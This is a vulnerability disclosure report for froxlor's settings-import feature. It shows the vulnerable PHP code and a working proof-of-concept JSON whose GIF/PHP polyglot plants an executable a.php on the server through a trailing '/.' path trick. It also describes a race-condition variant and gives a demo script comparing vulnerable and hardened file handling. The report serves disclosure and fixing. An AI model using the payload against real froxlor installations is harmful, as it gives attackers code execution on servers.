Remote Code Execution Vulnerability Through Unrestricted File Write in froxlor/froxlor

Valid

Reported on

Mar 4th 2023


Description

In the settings-import function, in the file Froxlor\lib\Froxlor\SImExporter.php, the image handling looks like this:

// both $img_filename and $img_data are taken from the imported settings file
file_put_contents($img_filename, $img_data);

if (function_exists('finfo_open')) {
    $finfo = finfo_open(FILEINFO_MIME_TYPE);
    $mimetype = finfo_file($finfo, $img_filename);
    finfo_close($finfo);
} else {
    $mimetype = mime_content_type($img_filename);
}
if (empty($mimetype)) {
    $mimetype = 'application/octet-stream';
}
if (!in_array($mimetype, ['image/jpeg', 'image/jpg', 'image/png', 'image/gif'])) {
    @unlink($img_filename);
    throw new Exception("Uploaded file is not a valid image");
}

$spl = explode('.', $img_filename);
$file_extension = strtolower(array_pop($spl));
unset($spl);

if (!in_array($file_extension, [
    'jpeg',
    'jpg',
    'png',
    'gif'
])) {
    @unlink($img_filename);
    throw new Exception("Invalid file-extension, use one of: jpeg, jpg, png, gif");
}

The code first writes the user-supplied data to the user-supplied file path, and only afterwards checks the MIME type and the file extension. If either check fails, it tries to remove the file again with unlink().

Unfortunately, there is a small trick between file_put_contents() and unlink(). If the file path is set to /img/a.php/., file_put_contents() saves the file as /img/a.php (PHP's stream layer normalizes the trailing /. away before opening the file), but unlink() is handed the literal path /img/a.php/. and cannot delete /img/a.php, because a.php is not a directory. The extension check in particular fails as intended, since explode('.', '/img/a.php/.') ends with an empty string rather than "php", but the only consequence of a failed check is the unlink() call that cannot succeed: the exception is thrown and a.php stays on disk.

Proof of Concept

Here is our proof of concept:

{
    "panel.version": "2.0.13",
    "panel.db_version": "202302030",
    "_sha": "bd48ad3bab8de5e10cd3e7882c19dd9457145d3d",
    "a.b.image_data": "R0lGODlhCjw/cGhwIHBocGluZm8oKTs=",
    "a.b": "/img/a.php/."
}

If we import this file in the settings panel, it decodes a.b.image_data (a GIF89a header followed by <?php phpinfo();, so that the MIME check sees image/gif) and writes it to img/a.php on the web server, where it is executed as PHP.

Attack video: https://drive.google.com/file/d/19ScE3oZ_G1VBk124QU35--cbQZ9T1Z4e/view?usp=sharing

It is also worth noting that the vulnerability is exploitable even without the unlink() trick. Because the file is written before it is validated and deleted, there is a window between file_put_contents() and unlink() during which the webshell can be reached; firing many parallel requests at it while the import runs is enough to win that race. We hope this is taken into account when the issue is fixed.
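As an added example (this is not Froxlor's code, and not the fix the maintainer shipped in 2.0.14), the following PHP script reproduces the write-then-check ordering in a scratch directory and contrasts it with a validate-then-write version that closes both the unlink() trick described above and the time-of-check race: the requested name is reduced to its basename, the extension and the MIME type are checked on the in-memory bytes before anything is written, and the file is created under a temporary name and renamed into place. The function names, constants and the temporary directory layout are this example's own assumptions.

```php
<?php
// Added example (not Froxlor's code): reproduces why the write-then-validate
// order in SImExporter.php leaves a file behind, then shows a
// validate-then-write rewrite. Function names, constants and paths are
// made up for this demonstration. Run with: php demo.php
declare(strict_types=1);

const ALLOWED_EXT  = ['jpeg', 'jpg', 'png', 'gif'];
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

// Constructed payload: the same base64 as the PoC, a GIF89a header
// followed by "<?php phpinfo();" so that libmagic reports image/gif.
$imgData = base64_decode('R0lGODlhCjw/cGhwIHBocGluZm8oKTs=', true);

// 1. The original ordering: write, then check the extension, unlink on failure.
function vulnerableSave(string $imgFilename, string $imgData): bool
{
    // The stream layer normalises "a.php/." to "a.php" before open(2).
    file_put_contents($imgFilename, $imgData);

    // explode() on "/img/a.php/." yields "" as the last element, so the
    // check fails, but unlink() receives the literal "a.php/." and fails too.
    $spl = explode('.', $imgFilename);
    $ext = strtolower(array_pop($spl));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        @unlink($imgFilename);
        return false;
    }
    return true;
}

// 2. Hardened ordering: derive a safe name, validate the bytes, only then write.
function safeSave(string $imgDir, string $requestedName, string $imgData): string
{
    // Keep only the final path component: "../x", "a.php/." and absolute
    // paths are all reduced to a plain file name.
    $base = basename($requestedName);
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new InvalidArgumentException('Invalid file-extension, use one of: jpeg, jpg, png, gif');
    }

    // Sniff the bytes in memory; nothing has touched the filesystem yet.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($imgData);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        throw new InvalidArgumentException('Uploaded file is not a valid image');
    }

    $dirReal = realpath($imgDir);
    if ($dirReal === false || !is_dir($dirReal)) {
        throw new RuntimeException('image directory does not exist');
    }

    // Write under a temporary name inside the target directory and rename it
    // into place: the final path never holds unvalidated content, and there
    // is no window in which a rejected file exists on disk.
    $tmp = tempnam($dirReal, 'upload-');
    if ($tmp === false || file_put_contents($tmp, $imgData) !== strlen($imgData)) {
        throw new RuntimeException('could not write image');
    }
    chmod($tmp, 0644);
    $target = $dirReal . DIRECTORY_SEPARATOR . $base;
    if (!rename($tmp, $target)) {
        @unlink($tmp);
        throw new RuntimeException('could not move image into place');
    }
    return $target;
}

// Demo in a scratch directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'froxlor-demo-' . getmypid();
mkdir($root . '/img', 0700, true);

$attackerPath = $root . '/img/a.php/.';            // the path from the PoC JSON
$accepted = vulnerableSave($attackerPath, $imgData);
printf("vulnerable: extension check %s, %s/img/a.php on disk: %s\n",
    $accepted ? 'passed' : 'failed', $root,
    file_exists($root . '/img/a.php') ? 'yes' : 'no');

foreach (['a.php/.', '../a.php', 'logo.gif'] as $name) {
    try {
        printf("hardened: %-10s -> wrote %s\n", $name, safeSave($root . '/img', $name, $imgData));
    } catch (InvalidArgumentException $e) {
        printf("hardened: %-10s -> rejected (%s)\n", $name, $e->getMessage());
    }
}

// Clean up the scratch directory.
array_map('unlink', glob($root . '/img/*') ?: []);
rmdir($root . '/img');
rmdir($root);
```

Note that the hardened version still accepts the GIF/PHP polyglot when it arrives as logo.gif: a MIME check proves only that the first bytes look like an image. That is acceptable only if the web server never executes files in the image directory as PHP, so disabling PHP handling for that directory belongs alongside the input validation.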

Impact

This vulnerability can be exploited to achieve remote code execution on the target web server.

Timeline

We are processing your report and will contact the froxlor team within 24 hours.
RenHao modified the report.
We have contacted a member of the froxlor team and are waiting to hear back.
froxlor/froxlor maintainer has acknowledged this report.
Michael Kaufmann validated this vulnerability.
RenHao has been awarded the disclosure bounty; the fix bounty is now up for grabs.
Michael Kaufmann marked this as fixed in 2.0.14 with commit f36bc6.
The fix bounty has been dropped.
This vulnerability has been assigned a CVE.
This vulnerability is scheduled to go public on Apr 14th 2023.
SImExporter.php#L197 has been validated.

RenHao (Researcher):

If possible, can the vulnerability go public as early as possible? I really need the CVE, please!

Michael Kaufmann published this vulnerability.